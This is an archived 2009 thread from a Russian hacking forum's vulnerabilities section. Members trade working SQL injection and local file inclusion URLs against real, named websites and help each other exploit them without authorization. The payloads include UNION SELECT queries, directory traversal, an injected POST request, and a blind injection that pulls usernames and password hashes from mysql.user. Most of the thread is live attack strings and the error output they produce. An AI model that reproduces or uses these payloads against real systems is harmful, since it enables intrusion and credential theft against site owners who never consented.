ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6121  
Старый 21.03.2009, 23:09
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

http://www.oldnewrock.ru/index.php?cont=history&pg=2007-onw&prt=rocktour%27
а тут возможно что то сделать?
Код:
Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36

Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36

Warning: main(): Failed opening 'history/2007-onw/inc_rocktour\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36
http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27

Код:
Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

http://www.big-home.ru/card.php?id=10'&type=2
даже не пытался

Последний раз редактировалось S0ulVortex; 21.03.2009 в 23:20..
 
Ответить с цитированием

  #6122  
Старый 22.03.2009, 00:38
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573

Репутация: 185
По умолчанию

Народ, подскажите что за хеш??
c2lkPTIzNTM2JmdpZD0yODMzMA==
Или каким алгоритмом зашифрованно?

===========

Вопрос закрыт, это base64... туплю

Последний раз редактировалось -=Static=-; 22.03.2009 в 00:41..
 
Ответить с цитированием

  #6123  
Старый 22.03.2009, 01:24
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573

Репутация: 185
По умолчанию

Цитата:
Сообщение от S0ulVortex  

http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27

Код:
Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

Есть локальный инклуд и SQL-inj

Цитата:
http://www.smsprogroup.ru/news.php?detale=-5%20UNION%20SELECT+1,2,3,4+from+news/*
Цитата:
http://www.smsprogroup.ru/static_page.php?sp=sms/../../../../../../../../www/smsprogr/www/htdocs/index
 
Ответить с цитированием

  #6124  
Старый 22.03.2009, 11:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7
Юнион почему-то не читает, почему?

Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка?

Код:
http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Тут вывода нету. Если минус поставить - пишет Unable to open image. Опять же не надо о блиндах Хочется юнионом вывести, а не посимвольно брутить.

ЗЫ: Если нельзья юнионом - так и скажите =)

Последний раз редактировалось mailbrush; 22.03.2009 в 11:49..
 
Ответить с цитированием

  #6125  
Старый 22.03.2009, 11:50
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7
Юнион почему-то не читает, почему?

Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка?
там юниона нету, т к 3 ветка.

Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+and+substring(version(),1,1)=3/*
Цитата:
Код:
http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
тут 4 ветка, вывод нашёл, смотри пм =)

Код:
http://www.texascitychamber.com/events/detail.php?EID=1+and+substring(version(),1,1)=4/*

Последний раз редактировалось z00MAN; 22.03.2009 в 12:12..
 
Ответить с цитированием

  #6126  
Старый 22.03.2009, 12:12
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

В код смотри
http://www.texascitychamber.com/events/detail.php?EID=11111+union+select+version(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25
4.1.22-standard
 
Ответить с цитированием

  #6127  
Старый 22.03.2009, 17:29
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Есть иньекция, данные передаются постом
_____________________________________________
POST http://www.agilebio.com:80/products_labcal_download.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.agilebio.com
Content-Length: 84
Cookie: PHPSESSID=aeghec9708or5shhuv04kufu11
Connection: Close
Pragma: no-cache

user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*user_pass=&Submit=Download%21&action=download
_____________________________________________

Подобрал поля, но вывода не вижу, он тут есть?

З.Ы. А get тоже работает вроде

http://www.agilebio.com/products_labcal_download.php?user_id='+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&user_pass=&Submit=Download%21&action=download

Наверное не могу поставить в id ошибочный параметр?
Пробовал с лимитом (+LIMIT+1,1/*) то же самое.
 
Ответить с цитированием

  #6128  
Старый 22.03.2009, 18:28
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Imperou$, гетом тоже можно

мор1ров

http://www.agilebio.com/products_labcal_download.php?user_id='+and+if(asci i(substring((select+concat_ws(0x2F,name,password)+ from+mysql.user+limit+0,1),1,1))>1,1,(select+1+uni on+select+3))=1/*&user_pass=&Submit=Download&action=download
 
Ответить с цитированием

  #6129  
Старый 22.03.2009, 19:15
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

http://www.ukrlib.com.ua/kratko-zl/printzip.php?id=77{вылазит ошибка}&bookid=5{Тут тоже инъекция но без явной ошибки}

ПОмогите правильно оборвать запрос а то вроде все перепробовал (#,{,/*,--,'#,'{,'/*,--,--+,'--+)
 
Ответить с цитированием

  #6130  
Старый 22.03.2009, 19:21
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Byrger,

Код:
Warning: file(data/.dat) [function.file]: failed to open stream: No such file or directory in /home/ukrlib/domains/ukrlib.com.ua/public_html/kratko-zl/printzip.php on line 24
ошибка с mysql не связана.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ